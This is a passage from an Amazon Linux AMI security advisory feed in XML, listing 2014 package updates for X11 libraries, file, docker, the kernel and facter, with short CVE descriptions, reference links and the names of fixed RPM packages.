Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1981" title="" id="CVE-2013-1981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1982" title="" id="CVE-2013-1982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1983" title="" id="CVE-2013-1983" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1984" title="" id="CVE-2013-1984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1985" title="" id="CVE-2013-1985" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1986" title="" id="CVE-2013-1986" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1987" title="" id="CVE-2013-1987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1988" title="" id="CVE-2013-1988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1989" title="" id="CVE-2013-1989" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1990" title="" id="CVE-2013-1990" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1991" title="" id="CVE-2013-1991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1995" title="" id="CVE-2013-1995" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1997" title="" id="CVE-2013-1997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1998" title="" id="CVE-2013-1998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1999" title="" id="CVE-2013-1999" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2000" title="" id="CVE-2013-2000" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2001" title="" id="CVE-2013-2001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2002" title="" id="CVE-2013-2002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2003" title="" id="CVE-2013-2003" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2004" title="" id="CVE-2013-2004" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2005" title="" id="CVE-2013-2005" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2062" title="" id="CVE-2013-2062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2064" title="" id="CVE-2013-2064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2066" title="" id="CVE-2013-2066" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1436.html" title="" id="RHSA-2014:1436" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-devel-1.1.14-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-1.1.14-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.9.amzn1.i686.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-1.1.14-2.1.9.amzn1.i686.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-devel-1.1.14-2.1.9.amzn1.i686.rpm</filename></package><package name="libXfixes-devel" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfixes-devel-5.0.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXfixes-debuginfo" version="5.0.1" release="2.1.8.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libXfixes-debuginfo-5.0.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXfixes" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfixes-5.0.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXfixes" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfixes-5.0.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXfixes-debuginfo" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfixes-debuginfo-5.0.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXfixes-devel" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfixes-devel-5.0.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXrandr-devel" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrandr-devel-1.4.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXrandr-debuginfo" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrandr-debuginfo-1.4.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXrandr" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrandr-1.4.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXrandr-debuginfo" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXrandr-debuginfo-1.4.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXrandr" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXrandr-1.4.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXrandr-devel" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXrandr-devel-1.4.1-2.1.8.amzn1.i686.rpm</filename></package><package name="xorg-x11-proto-devel" version="7.7" release="9.10.amzn1" epoch="0" 
arch="noarch"><filename>Packages/xorg-x11-proto-devel-7.7-9.10.amzn1.noarch.rpm</filename></package><package name="libXrender-devel" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrender-devel-0.9.8-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXrender" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrender-0.9.8-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXrender-debuginfo" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrender-debuginfo-0.9.8-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXrender" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXrender-0.9.8-2.1.9.amzn1.i686.rpm</filename></package><package name="libXrender-debuginfo" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXrender-debuginfo-0.9.8-2.1.9.amzn1.i686.rpm</filename></package><package name="libXrender-devel" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXrender-devel-0.9.8-2.1.9.amzn1.i686.rpm</filename></package><package name="libXres-devel" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXres-devel-1.0.7-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXres-debuginfo" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXres-debuginfo-1.0.7-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXres" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXres-1.0.7-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXres-debuginfo" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXres-debuginfo-1.0.7-2.1.8.amzn1.i686.rpm</filename></package><package name="libXres" version="1.0.7" release="2.1.8.amzn1" epoch="0" 
arch="i686"><filename>Packages/libXres-1.0.7-2.1.8.amzn1.i686.rpm</filename></package><package name="libXres-devel" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXres-devel-1.0.7-2.1.8.amzn1.i686.rpm</filename></package><package name="libXt-devel" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXt-devel-1.1.4-6.1.9.amzn1.x86_64.rpm</filename></package><package name="libXt" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXt-1.1.4-6.1.9.amzn1.x86_64.rpm</filename></package><package name="libXt-debuginfo" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXt-debuginfo-1.1.4-6.1.9.amzn1.x86_64.rpm</filename></package><package name="libXt-devel" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXt-devel-1.1.4-6.1.9.amzn1.i686.rpm</filename></package><package name="libXt-debuginfo" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXt-debuginfo-1.1.4-6.1.9.amzn1.i686.rpm</filename></package><package name="libXt" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXt-1.1.4-6.1.9.amzn1.i686.rpm</filename></package><package name="libXv-devel" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXv-devel-1.0.9-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXv" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXv-1.0.9-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXv-debuginfo" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXv-debuginfo-1.0.9-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXv-devel" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXv-devel-1.0.9-2.1.8.amzn1.i686.rpm</filename></package><package name="libXv-debuginfo" version="1.0.9" release="2.1.8.amzn1" 
epoch="0" arch="i686"><filename>Packages/libXv-debuginfo-1.0.9-2.1.8.amzn1.i686.rpm</filename></package><package name="libXv" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXv-1.0.9-2.1.8.amzn1.i686.rpm</filename></package><package name="libXvMC" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXvMC-1.0.8-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXvMC-debuginfo" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXvMC-debuginfo-1.0.8-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXvMC-devel" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXvMC-devel-1.0.8-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXvMC" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXvMC-1.0.8-2.1.8.amzn1.i686.rpm</filename></package><package name="libXvMC-debuginfo" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXvMC-debuginfo-1.0.8-2.1.8.amzn1.i686.rpm</filename></package><package name="libXvMC-devel" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXvMC-devel-1.0.8-2.1.8.amzn1.i686.rpm</filename></package><package name="libXi-debuginfo" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXi-debuginfo-1.7.2-2.2.9.amzn1.x86_64.rpm</filename></package><package name="libXi" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXi-1.7.2-2.2.9.amzn1.x86_64.rpm</filename></package><package name="libXi-devel" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXi-devel-1.7.2-2.2.9.amzn1.x86_64.rpm</filename></package><package name="libXi" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXi-1.7.2-2.2.9.amzn1.i686.rpm</filename></package><package name="libXi-devel" version="1.7.2" 
release="2.2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXi-devel-1.7.2-2.2.9.amzn1.i686.rpm</filename></package><package name="libXi-debuginfo" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXi-debuginfo-1.7.2-2.2.9.amzn1.i686.rpm</filename></package><package name="libXxf86dga-debuginfo" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86dga-debuginfo-1.1.4-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXxf86dga-devel" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86dga-devel-1.1.4-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXxf86dga" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86dga-1.1.4-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXxf86dga" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86dga-1.1.4-2.1.8.amzn1.i686.rpm</filename></package><package name="libXxf86dga-debuginfo" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86dga-debuginfo-1.1.4-2.1.8.amzn1.i686.rpm</filename></package><package name="libXxf86dga-devel" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86dga-devel-1.1.4-2.1.8.amzn1.i686.rpm</filename></package><package name="libXxf86vm-debuginfo" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86vm-debuginfo-1.1.3-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXxf86vm-devel" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86vm-devel-1.1.3-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXxf86vm" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86vm-1.1.3-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXxf86vm-devel" version="1.1.3" release="2.1.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/libXxf86vm-devel-1.1.3-2.1.9.amzn1.i686.rpm</filename></package><package name="libXxf86vm-debuginfo" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86vm-debuginfo-1.1.3-2.1.9.amzn1.i686.rpm</filename></package><package name="libXxf86vm" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86vm-1.1.3-2.1.9.amzn1.i686.rpm</filename></package><package name="libdmx-debuginfo" version="1.1.3" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libdmx-debuginfo-1.1.3-3.7.amzn1.x86_64.rpm</filename></package><package name="libdmx" version="1.1.3" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libdmx-1.1.3-3.7.amzn1.x86_64.rpm</filename></package><package name="libdmx-devel" version="1.1.3" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libdmx-devel-1.1.3-3.7.amzn1.x86_64.rpm</filename></package><package name="libdmx-debuginfo" version="1.1.3" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libdmx-debuginfo-1.1.3-3.7.amzn1.i686.rpm</filename></package><package name="libdmx" version="1.1.3" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libdmx-1.1.3-3.7.amzn1.i686.rpm</filename></package><package name="libdmx-devel" version="1.1.3" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libdmx-devel-1.1.3-3.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-453</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-453: medium priority package update for file</title><issued date="2014-11-22 14:34:00" /><updated date="2014-11-24 12:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3710:
An out-of-bounds read flaw was found in the way the File Information (fileinfo) extension parsed Executable and Linkable Format (ELF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted ELF file.
1155071:
CVE-2014-3710 file: out-of-bounds read in elf note headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710" title="" id="CVE-2014-3710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-debuginfo" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="python-magic" version="5.19" release="7.24.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.19-7.24.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file-static" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.19" release="7.24.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-devel-5.19-7.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-454</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-454: critical priority package update for docker</title><issued date="2014-11-25 12:22:00" /><updated date="2014-11-25 12:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6408:
1167506:
CVE-2014-6408 docker: potential container escalation
CVE-2014-6407:
1167505:
CVE-2014-6407 docker: symbolic and hardlink issues leading to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6407" title="" id="CVE-2014-6407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6408" title="" id="CVE-2014-6408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="1.3.2" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.3.2-1.0.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.3.2" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.3.2-1.0.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.3.2" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.3.2-1.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-455</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-455: medium priority package update for kernel</title><issued date="2014-12-03 22:27:00" /><updated date="2014-12-18 14:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9322:
A flaw was found in the way the Linux kernel handled GS segment register base switching when recovering from a #SS (stack segment) fault on an erroneous return to user space. A local, unprivileged user could use this flaw to escalate their privileges on the system.
1172806:
CVE-2014-9322 kernel: x86: local privesc due to bad_iret and paranoid entry incompatibility
CVE-2014-9090:
The do_double_fault function in arch/x86/kernel/traps.c in the Linux kernel through 3.17.4 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to cause a denial of service (panic) via a modify_ldt system call, as demonstrated by sigreturn_32 in the linux-clock-tests test suite.
1170691:
CVE-2014-9090 kernel: espfix64: local DoS via do_double_fault() due to improper handling of faults associated with SS segment register
CVE-2014-7970:
The pivot_root implementation in fs/namespace.c in the Linux kernel through 3.17 does not properly interact with certain locations of a chroot directory, which allows local users to cause a denial of service (mount-tree loop) via . (dot) values in both arguments to the pivot_root system call.
1151095:
CVE-2014-7970 Kernel: fs: VFS denial of service
CVE-2014-7841:
The sctp_process_param function in net/sctp/sm_make_chunk.c in the SCTP implementation in the Linux kernel before 3.17.4, when ASCONF is used, allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) via a malformed INIT chunk.
1163087:
CVE-2014-7841 kernel: net: sctp: NULL pointer dereference in af-&gt;from_addr_param on malformed packet
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7841" title="" id="CVE-2014-7841" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7970" title="" id="CVE-2014-7970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9090" title="" id="CVE-2014-9090" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9322" title="" id="CVE-2014-9322" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.26" release="24.46.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-headers-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.26" release="24.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.26-24.46.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-456</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-456: medium priority package update for facter</title><issued date="2014-12-08 13:12:00" /><updated date="2014-12-08 13:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3248:
Untrusted search path vulnerability in Puppet Enterprise 2.8 before 2.8.7, Puppet before 2.7.26 and 3.x before 3.6.2, Facter 1.6.x and 2.x before 2.0.2, Hiera before 1.3.4, and Mcollective before 2.5.2, when running with Ruby 1.9.1 or earlier, allows local users to gain privileges via a Trojan horse file in the current working directory, as demonstrated using (1) rubygems/defaults/operating_system.rb, (2) Win32API.rb, (3) Win32API.so, (4) safe_yaml.rb, (5) safe_yaml/deep.rb, or (6) safe_yaml/deep.so; or (7) operatingsystem.rb, (8) operatingsystem.so, (9) osfamily.rb, or (10) osfamily.so in puppet/confine.
1101346:
CVE-2014-3248 puppet: Ruby modules could be loaded from the current working directory
